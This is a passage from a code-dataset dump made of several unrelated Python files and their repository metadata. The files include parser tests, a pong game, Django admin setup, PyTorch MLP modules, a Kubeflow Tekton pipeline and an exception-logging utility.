a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[3,1]]")
eq.int2dArr([[1,3], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[]]")
eq.int2dArr([[1,3], []], a2d)
a2d = parse2d.parseInt("[[],[]]")
eq.int2dArr([[], []], a2d)
a2d = parse2d.parseInt("[[1],[2], [3]]")
eq.int2dArr([[1], [2], [3]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [3]]")
eq.int2dArr([[1], [3], [2, 3, 4, 5, 6, 7]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [10, 12]]")
eq.int2dArr([[1], [10, 12], [2, 3, 4, 5, 6, 7]], a2d)
def testParse3d(self):
eq = Eq()
parse3d = XdArrParser(3)
a3d = parse3d.parseInt("[[[1],[3,1]]]")
print(a3d)
eq.int2dArr([[1], [1,3]], a3d[0])
class TestFile(unittest.TestCase):
def testAssertFile(self):
eq = Eq()
eq.int2dArrFile('data/case01.txt', 2)
eq.int2dArrFile('data/case02.txt', 2)
eq.int2dArrFile('data/case03.txt', 2)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 27.375 | 91 | 0.435788 | 451 | 3,504 | 3.368071 | 0.13969 | 0.164582 | 0.137591 | 0.094799 | 0.695853 | 0.64977 | 0.613562 | 0.56287 | 0.535221 | 0.535221 | 0 | 0.108941 | 0.342466 | 3,504 | 128 | 92 | 27.375 | 0.550347 | 0.027397 | 0 | 0.451613 | 0 | 0.010753 | 0.108824 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 1 | 0.043011 | false | 0 | 0.021505 | 0 | 0.086022 | 0.11828 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e705a57826a489b26a0995f0c679c1815e1975ce | 701 | py | Python | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | def anagram(s1, s2):
result = False #set your base
if len(s1) == len(s2): #can't be anagrams if diff length
count = 0 #used to check for matches
i = 0
while i < len(s1): #'outer loop' for s1
j = 0
while j < len(s2): #'inner loop' to check every s2 letter for each s1 letter
if s1[i:i+1] == s2[j:j+1]: #if theres a match
count += 1 #++ count
j += 1
i += 1
if count == len(s1): #if count == s1len then it means they must have the exact same letters
result = True
return result
anagram("jack","kabj")
| 36.894737 | 100 | 0.46933 | 99 | 701 | 3.323232 | 0.525253 | 0.045593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.430813 | 701 | 18 | 101 | 38.944444 | 0.77193 | 0.340942 | 0 | 0 | 0 | 0 | 0.017621 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e706666948f0a275a5dbfc4777f61a9c59c85d96 | 2,298 | py | Python | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | from pygame import *
win_width=600
win_height=500
class GameSprite(sprite.Sprite):
def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed ):
super().__init__()
self.image = transform.scale(image.load(player_image), (size_x, size_y))
self.speed = player_speed
self.rect = self.image.get_rect()
self.rect.x = player_x
self.rect.y = player_y
def reset(self):
window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
def updatel(self):
keys = key.get_pressed()
if keys[K_w] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_s] and self.rect.y < win_height - 80:
self.rect.y += self.speed
def updater(self):
keys = key.get_pressed()
if keys[K_UP] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_DOWN] and self.rect.y < win_height - 80:
self.rect.y += self.speed
back=(200, 255, 255)
window=display.set_mode((win_width, win_height))
window.fill(back)
p_l= Player('racket.png', 30, 200, 10, 80, 10)
p_r= Player('racket.png', 520, 200, 10, 80, 10)
ball=GameSprite('tenis_ball.png', 200, 200, 30, 30, 70)
font.init()
font = font.SysFont("Areal", 35)
win1 = font.render('Player 1 Win!', True, (230, 255, 0))
win2 = font.render('Player 2 Win!', True, (230, 255, 0))
speed_x=3
speed_y=3
game=True
finish=False
clock=time.Clock()
FPS=60
while game:
for e in event.get():
if e.type == QUIT:
game = False
if finish != True:
window.fill(back)
p_l.updatel()
p_r.updater()
ball.rect.x += speed_x
ball.rect.y += speed_y
if sprite.collide_rect(p_l, ball) or sprite.collide_rect(p_r, ball):
speed_x*=-1
if ball.rect.y > win_height-50 or ball.rect.y < 0:
speed_y *=-1
if ball.rect.x < 0:
finish=True
window.blit(win2, (200,200))
if ball.rect.x > win_width:
finish=True
window.blit(win1, (200,200))
p_l.reset()
p_r.reset()
ball.reset()
display.update()
clock.tick(FPS) | 26.72093 | 89 | 0.561793 | 344 | 2,298 | 3.598837 | 0.270349 | 0.084006 | 0.072698 | 0.038772 | 0.221325 | 0.172859 | 0.172859 | 0.172859 | 0.127625 | 0.127625 | 0 | 0.062461 | 0.303307 | 2,298 | 86 | 90 | 26.72093 | 0.710806 | 0 | 0 | 0.149254 | 0 | 0 | 0.029359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.014925 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e707604999bdeed189d1ba802afd56ed532a88c3 | 2,121 | py | Python | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | 1 | 2015-09-28T17:11:12.000Z | 2015-09-28T17:11:12.000Z | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | 4 | 2020-02-11T22:59:54.000Z | 2021-06-10T17:55:15.000Z | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | null | null | null | from django.contrib import admin
from datetime import *
from companies.models import Sector, IndustryGroup, Industry, SubIndustry
from companies.models import Company, Ownership, Director, Executive, CompanyNameChange
class SectorAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'custom')
admin.site.register(Sector, SectorAdmin)
class IndustryGroupAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'sector', 'custom')
admin.site.register(IndustryGroup, IndustryGroupAdmin)
class IndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry_group', 'sector', 'custom')
admin.site.register(Industry, IndustryAdmin)
class SubIndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry', 'custom')
admin.site.register(SubIndustry, SubIndustryAdmin)
class CompanyNameChangeAdmin(admin.ModelAdmin):
search_fields=["company__name", "name_before", "name_after"]
list_display = ('company', 'date', 'name_before', 'name_after')
list_filter=['date']
admin.site.register(CompanyNameChange, CompanyNameChangeAdmin)
class CompanyAdmin(admin.ModelAdmin):
search_fields=["name",]
prepopulated_fields = { 'slug_name': ['name'] }
list_filter=['country', 'is_auditor']
list_display = ('name', 'country', 'company_type', 'sub_industry')
admin.site.register(Company, CompanyAdmin)
class OwnershipAdmin(admin.ModelAdmin):
search_fields=["name",]
admin.site.register(Ownership, OwnershipAdmin)
# People
class DirectorAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Director, DirectorAdmin)
class ExecutiveAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Executive, ExecutiveAdmin)
class DirectorInline(admin.TabularInline):
model = Director
class ExecutivesInline(admin.TabularInline):
model = Executive
| 35.949153 | 101 | 0.754833 | 225 | 2,121 | 6.888889 | 0.262222 | 0.087097 | 0.121935 | 0.156774 | 0.405161 | 0.298065 | 0.273548 | 0.273548 | 0.273548 | 0.206452 | 0 | 0 | 0.110797 | 2,121 | 58 | 102 | 36.568966 | 0.821845 | 0.002829 | 0 | 0.181818 | 0 | 0 | 0.185045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.795455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e708f0f5533cb309985218c0e13c8f1882c1ecf0 | 2,234 | py | Python | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 23 | 2015-10-28T09:02:41.000Z | 2021-12-15T08:40:41.000Z | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 326 | 2015-11-03T12:59:48.000Z | 2022-03-11T23:18:14.000Z | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 10 | 2016-02-05T08:43:07.000Z | 2022-03-09T10:04:32.000Z | import operator
import requests
from ocd_backend.enrichers.text_enricher.tasks import BaseEnrichmentTask
from ocd_backend.models.definitions import Meeting as MeetingNS, Rdf
from ocd_backend.models.misc import Uri
from ocd_backend.settings import ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT
from ocd_backend.utils.http import HttpRequestMixin
from ocd_backend.log import get_source_logger
log = get_source_logger('theme_classifier')
class ThemeClassifier(BaseEnrichmentTask, HttpRequestMixin):
def enrich_item(self, item):
if not ORI_CLASSIFIER_HOST or not ORI_CLASSIFIER_PORT:
# Skip classifier if no host is specified
return
ori_classifier_url = 'http://{}:{}/classificeer'.format(ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT)
if not hasattr(item, 'text'):
return
text = item.text
if type(item.text) == list:
text = ' '.join(text)
if not text or len(text) < 76:
return
identifier_key = 'result'
request_json = {
'ori_identifier': identifier_key, # not being used
'name': text
}
try:
response = self.http_session.post(ori_classifier_url, json=request_json)
response.raise_for_status()
except requests.ConnectionError:
# Return if no connection can be made
log.warning('No connection to theme classifier')
return
response_json = response.json()
theme_classifications = response_json.get(identifier_key, [])
# Do not try this at home
tags = {
'@id': '%s#tags' % item.get_ori_identifier(),
'@type': str(Uri(Rdf, 'Seq'))
}
i = 0
for name, value in sorted(theme_classifications.items(), key=operator.itemgetter(1), reverse=True):
tag = {
'@id': '%s#tags_%s' % (item.get_ori_identifier(), i),
'@type': str(Uri(MeetingNS, 'TagHit')),
str(Uri(MeetingNS, 'tag')): name,
str(Uri(MeetingNS, 'score')): value,
}
tags[str(Uri(Rdf, '_%s' % i))] = tag
i += 1
# No really, don't
item.tags = tags
| 32.376812 | 107 | 0.608774 | 261 | 2,234 | 5.02682 | 0.398467 | 0.079268 | 0.064024 | 0.030488 | 0.051829 | 0.051829 | 0 | 0 | 0 | 0 | 0 | 0.003157 | 0.290958 | 2,234 | 68 | 108 | 32.852941 | 0.825126 | 0.058639 | 0 | 0.081633 | 0 | 0 | 0.074392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.163265 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e70abdf746f94ff1be56b5f084ab1342ab7e56e2 | 3,465 | py | Python | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 13 | 2020-05-04T01:19:32.000Z | 2022-03-09T03:03:01.000Z | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 1 | 2020-12-17T00:58:42.000Z | 2020-12-17T01:56:33.000Z | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 3 | 2020-07-01T06:14:24.000Z | 2022-01-06T04:08:48.000Z |
"""
YOU ONLY TRAIN ONCE: LOSS-CONDITIONAL TRAINING OF DEEP NETWORKS
# https://openreview.net/pdf?id=HyxY6JHKwr
For YOTO models, we condition the last layer of each convolutional block.
The conditioning MLP has one hidden layer with 256 units on Shapes3D and 512 units on CIFAR-10.
At training time we sample the β parameter from log-normal distribution on the interval [0.125, 1024.]
for Shapes3D and on the interval [0.125, 512.] for CIFAR-10.
FiLM: Visual Reasoning with a General Conditioning Layer
# https://arxiv.org/pdf/1709.07871.pdf
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class MLP(nn.Module):
def __init__(self, n_input, n_output, hidden_neurons=(512,), dropout_rate=0.1):
super(MLP, self).__init__()
n_neurons = (n_input,) + hidden_neurons + (n_output,)
self.layers = nn.ModuleList()
for i in range(len(n_neurons) - 1):
self.layers.append(nn.Linear(n_neurons[i], n_neurons[i+1]))
#self.layers.append(nn.BatchNorm1d(n_neurons[i+1]))
self.act = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x):
h = x
for i in range(len(self.layers)-1):
h = self.dropout(self.act(self.layers[i](h)))
h = self.layers[-1](h)
return h
class MultiheadMLP(nn.Module):
def __init__(self, n_input, n_outputs=(16, 32),
common_hidden_neurons=(64,),
multi_head_hidden_neurons=((128, 16), (128, 32)),
dropout_rate=0.1):
super(MultiheadMLP, self).__init__()
n_head = len(n_outputs)
# common layer
if common_hidden_neurons is not None:
com_neurons = (n_input,) + common_hidden_neurons
self.com_layers = []
for i in range(len(com_neurons) - 1):
self.com_layers.append(nn.Linear(com_neurons[i], com_neurons[i+1]))
#self.com_layers.append(nn.BatchNorm1d(com_neurons[i+1]))
self.com_layers.append(nn.ReLU(inplace=True))
self.com_layers.append(nn.Dropout(dropout_rate))
self.com_layers = nn.Sequential(*self.com_layers)
else:
com_neurons = (n_input,)
self.com_layers = None
# multi head layer
self.head_layers = nn.ModuleList()
for ih in range(n_head):
if multi_head_hidden_neurons is not None and multi_head_hidden_neurons[ih] is not None:
h_neurons = (com_neurons[-1],) + multi_head_hidden_neurons[ih] + (n_outputs[ih],)
else:
h_neurons = (com_neurons[-1],) + (n_outputs[ih],)
h_layers = []
for i in range(len(h_neurons) - 1):
h_layers.append(nn.Linear(h_neurons[i], h_neurons[i+1]))
if i < len(h_neurons) - 2:
#h_layers.append(nn.BatchNorm1d(h_neurons[i+1]))
h_layers.append(nn.ReLU(inplace=True))
h_layers.append(nn.Dropout(dropout_rate))
self.head_layers.append(nn.Sequential(*h_layers))
def forward(self, x):
if self.com_layers is not None:
h = self.com_layers(x)
else:
h = x
hs = []
for ly in self.head_layers:
hs.append(ly(h))
return hs
| 33.317308 | 104 | 0.583261 | 474 | 3,465 | 4.067511 | 0.251055 | 0.068465 | 0.079876 | 0.022822 | 0.327282 | 0.153527 | 0.098548 | 0.061203 | 0.034232 | 0 | 0 | 0.031977 | 0.305051 | 3,465 | 103 | 105 | 33.640777 | 0.768688 | 0.208947 | 0 | 0.12069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.051724 | 0 | 0.189655 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e70f113a220c3f243ab0f7dd157ded80f7e74758 | 4,616 | py | Python | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
] | 2 | 2021-06-23T08:52:20.000Z | 2021-06-23T08:52:31.000Z | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
] | null | null | null | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
] | null | null | null | import collections
import pandas as pd
import numpy as np
import re
import os
def count(fl,target='input_context',checks='input_keyword', vocab_size=10000):
cnter = collections.Counter()
s = set()
for filename in fl:
cur_df = pd.read_pickle(filename)
texts = cur_df[target].tolist()
for i in texts:
cnter.update(i[1:])
s.add(i[0])
#check
for filename in fl:
cur_df = pd.read_pickle(filename)
for check in checks:
texts = cur_df[check].tolist()
for i in texts:
s.update(i)
for i in s:
if i not in cnter:
cnter[i] = 1
for i in range(vocab_size):
if i not in cnter:
cnter[i] = 1
tot = 0
cum_prob = [0]
for i in cnter.most_common():
tot += i[1]
for i in cnter.most_common():
cum_prob.append(cum_prob[-1] + i[1] / tot)
cum_prob.pop(0)
new_dict = dict([(int(old[0]), int(new)) for (new, old) in enumerate(cnter.most_common())])
return cum_prob, new_dict
def convert_and_save(fl,dic,targets:list):
for filename in fl:
cur_df = convert_idx(filename,dic,targets)
new_filename = re.sub(r'indexed/','indexed_new/',filename)
if not os.path.exists(os.path.dirname(new_filename)):
os.makedirs(os.path.dirname(new_filename))
cur_df.to_pickle(new_filename)
def convert_idx(filename, dic, targets:list):
key_type = type(list(dic)[0])
cur_df = pd.read_pickle(filename)
for target in targets:
new = []
for line in cur_df[target].tolist():
converted = []
for token in line:
converted.append(dic[key_type(token)])
new.append(converted)
cur_df[target] = new
return cur_df
def old_compute_cutoffs(probs,n_cutoffs):
cutoffs = []
cut_prob = 1/n_cutoffs
cnt = 0
target_probs = cut_prob
for idx,prob in enumerate(probs):
if prob>target_probs:
cutoffs.append(idx + 1)
target_probs += cut_prob
cnt +=1
if cnt >= n_cutoffs -1:
break
return cutoffs
def uniform_cutoffs(probs,n_cutoffs):
per_cluster_n = len(probs) // n_cutoffs
return [per_cluster_n * i for i in range(1,n_cutoffs)]
def compute_cutoffs(probs,n_cutoffs):
def rebalance_cutprob():
remaining_prob = 1 - prior_cluster_prob
n = n_cutoffs - cnt
return remaining_prob / n
cutoffs = []
probs = probs
cut_prob = 1/n_cutoffs
cnt = 0
prior_cluster_prob = 0.0
prior_idx = 0
for idx, prob in enumerate(probs):
cluster_cumprob = prob - prior_cluster_prob
if cluster_cumprob > cut_prob:
if idx != prior_idx:
cutoffs.append(idx)
prior_cluster_prob = probs[idx-1]
prior_idx = idx
else:
cutoffs.append(idx+1)
prior_cluster_prob = probs[idx]
prior_idx = idx + 1
cnt += 1
cut_prob = rebalance_cutprob()
if cnt >= n_cutoffs -1:
break
return cutoffs
def cumulative_to_indivisual(cum_prob):
cum_prob.insert(0, 0)
new = []
for i in range(1,len(cum_prob)):
new.append(cum_prob[i] - cum_prob[i - 1])
cum_prob.pop(0)
return new
def normalized_entropy(x):
if len(x) ==1:
return 1.0
x = np.array(x)
x = x / np.sum(x)
entropy = -np.sum(x*np.log2(x))
z = np.log2(len(x))
return entropy / z
def cluster_probs(probs,cutoffs):
p = [probs[cutoffs[0]-1]]
for l,r in zip(cutoffs[:-1], cutoffs[1:]):
p.append(probs[r-1]-probs[l-1])
p.append(1.0-probs[cutoffs[-1]])
return p
def ideal_cutoffs(probs,lower=2,upper=None):
ind_probs = cumulative_to_indivisual(probs)
ideal = None
max_mean = 0
if not upper:
upper = int(1 / probs[0])
for target in range(lower,upper+1):
mean = []
cutoffs = compute_cutoffs(probs,target)
added_cutoffs = [0] + cutoffs + [len(probs)]
for i in range(target):
cluster = ind_probs[added_cutoffs[i]:added_cutoffs[i + 1]]
mean.append(normalized_entropy(cluster))
cluster_prob = cluster_probs(probs,cutoffs)
head = normalized_entropy(cluster_prob)
tail = np.sum(np.array(mean)) / np.array(mean).nonzero()[0].size
mean = head * tail
# print(head, tail, mean)
if mean > max_mean:
max_mean = mean
ideal = cutoffs
return ideal
| 27.807229 | 95 | 0.581672 | 655 | 4,616 | 3.926718 | 0.180153 | 0.029938 | 0.020995 | 0.017107 | 0.251555 | 0.145801 | 0.101477 | 0.073872 | 0.05832 | 0.031104 | 0 | 0.019074 | 0.307192 | 4,616 | 165 | 96 | 27.975758 | 0.785178 | 0.006283 | 0 | 0.258993 | 0 | 0 | 0.010039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079137 | false | 0 | 0.035971 | 0 | 0.194245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7118f625a826be6f20337e189488ef58415fddb | 1,972 | py | Python | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 102 | 2019-10-23T20:35:41.000Z | 2022-03-27T10:28:56.000Z | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 891 | 2019-10-24T04:08:17.000Z | 2022-03-31T22:45:40.000Z | sdk/python/tests/compiler/testdata/tekton_loop_dsl.py | kubeflow/kfp-tekton | b16bd8863aaf36de240b7306f501d62b95f01f31 | [
"Apache-2.0"
] | 85 | 2019-10-24T04:04:36.000Z | 2022-03-01T10:52:57.000Z | # Copyright 2021 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kfp.dsl as dsl
from kfp import components
from kfp_tekton import tekton
op1_yaml = '''\
name: 'my-in-coop1'
inputs:
- {name: item, type: Integer}
- {name: my_pipe_param, type: Integer}
implementation:
container:
image: library/bash:4.4.23
command: ['sh', '-c']
args:
- |
set -e
echo op1 "$0" "$1"
- {inputValue: item}
- {inputValue: my_pipe_param}
'''
@dsl.pipeline(name='my-pipeline')
def pipeline(my_pipe_param: int = 10):
loop_args = [1, 2]
# The DSL above should produce the same result and the DSL in the bottom
# with dsl.ParallelFor(loop_args, parallelism=1) as item:
# op1_template = components.load_component_from_text(op1_yaml)
# op1 = op1_template(item, my_pipe_param)
# condi_1 = tekton.CEL_ConditionOp(f"{item} == 0").output
# with dsl.Condition(condi_1 == 'true'):
# tekton.Break()
with tekton.Loop.sequential(loop_args) as item:
op1_template = components.load_component_from_text(op1_yaml)
op1 = op1_template(item, my_pipe_param)
condi_1 = tekton.CEL_ConditionOp(f"{item} == 1").output
with dsl.Condition(condi_1 == 'true'):
tekton.Break()
if __name__ == '__main__':
from kfp_tekton.compiler import TektonCompiler
TektonCompiler().compile(pipeline, __file__.replace('.py', '.yaml'))
| 34 | 76 | 0.674949 | 274 | 1,972 | 4.689781 | 0.467153 | 0.046693 | 0.042802 | 0.024903 | 0.245914 | 0.245914 | 0.245914 | 0.245914 | 0.245914 | 0.178988 | 0 | 0.023271 | 0.215517 | 1,972 | 57 | 77 | 34.596491 | 0.807369 | 0.462475 | 0 | 0 | 0 | 0 | 0.361886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e715ae23973f203c68cfe998932183b2bad3bee2 | 6,966 | py | Python | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | excptr/excptr.py | kakkarja/Excptr | 2ed1b40da339130eb15770c1cc91e94e3a17690f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2022, KarjaKAK
# All rights reserved.
from functools import wraps
from textwrap import fill
from contextlib import redirect_stdout
from datetime import datetime as dt
import io, inspect, os, sys
__all__ = ['']
DIRPATH = (
os.environ["USERPROFILE"] if sys.platform.startswith("win") else os.environ["HOME"]
)
DEFAULTDIR = os.path.join(DIRPATH, "EXCPTR")
DEFAULTFILE = os.path.join(
DEFAULTDIR, f"{int(dt.timestamp(dt.today().replace(microsecond=0)))}_EXCPTR.log"
)
def defd():
"""Create default directory"""
if not os.path.isdir(DEFAULTDIR):
os.mkdir(DEFAULTDIR)
else:
raise Exception(f"{DEFAULTDIR} is already exist!")
def prex(details, exc_tr, fc_name):
"""Printing Exception"""
print(f"\nFilename caller: {details[0].filename.upper()}\n")
print(f"ERROR - <{fc_name}>:")
print(f"{'-' * 70}", end="\n")
print("Start at:\n")
filenm = details[0].filename
for detail in details:
if "excptr.py" not in detail.filename:
if filenm != detail.filename:
print(f"Filename: {detail.filename.upper()}\n")
cc = fill(
"".join(detail.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {detail.lineno} in {detail.function}:\n" f"{cc}\n")
del cc
del detail
tot = f">>>- Exception raise: {exc_tr.__class__.__name__} ->"
print("~" * len(tot))
print(tot)
print("~" * len(tot) + "\n")
allextr = inspect.getinnerframes(exc_tr.__traceback__)[1:]
for extr in allextr:
if "excptr.py" not in extr.filename:
if filenm != extr.filename:
print(f"Filename: {extr.filename.upper()}\n")
cc = fill(
"".join(extr.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {extr.lineno} in {extr.function}:\n" f"{cc}\n")
del cc
del extr
print(f"{exc_tr.__class__.__name__}: {exc_tr.args[0]}")
print(f"{'-' * 70}", end="\n")
del tot, allextr, filenm, details, exc_tr, fc_name
def crtk(v: str):
"""Tkinter gui display"""
import tkinter as tk
from tkinter import messagebox as msg
root = tk.Tk()
root.title("Exception Error Messages")
root.attributes("-topmost", 1)
text = tk.Listbox(root, relief=tk.FLAT, width=70, selectbackground="light green")
text.pack(side="left", expand=1, fill=tk.BOTH, pady=2, padx=(2, 0))
scr = tk.Scrollbar(root, orient=tk.VERTICAL)
scr.pack(side="right", fill=tk.BOTH)
scr.config(command=text.yview)
text.config(yscrollcommand=scr.set)
val = v.splitlines()
for v in val:
text.insert(tk.END, v)
text.config(
state=tk.DISABLED,
bg="grey97",
disabledforeground="black",
font="courier 12",
height=len(val),
)
del val, v
scnd = 5000
def viewing():
nonlocal scnd
scnd += scnd if scnd < 20000 else 5000
match scnd:
case sec if sec <= 25000:
ans = msg.askyesno(
"Viewing",
f"Still viewing for another {scnd//1000} seconds?",
parent=root,
)
if ans:
root.after(scnd, viewing)
else:
root.destroy()
case sec if sec > 25000:
msg.showinfo(
"Viewing", "Viewing cannot exceed more than 1 minute!", parent=root
)
root.destroy()
root.after(5000, viewing)
root.mainloop()
del root, text, scr, scnd
def ckrflex(filenm: str) -> bool:
"""Checking file existence or an empty file"""
if os.path.exists(filenm):
with open(filenm) as rd:
if rd.readline():
return False
else:
return True
else:
return True
def excp(m: int = -1, filenm: str = None):
"""Decorator for function"""
match m:
case m if not isinstance(m, int):
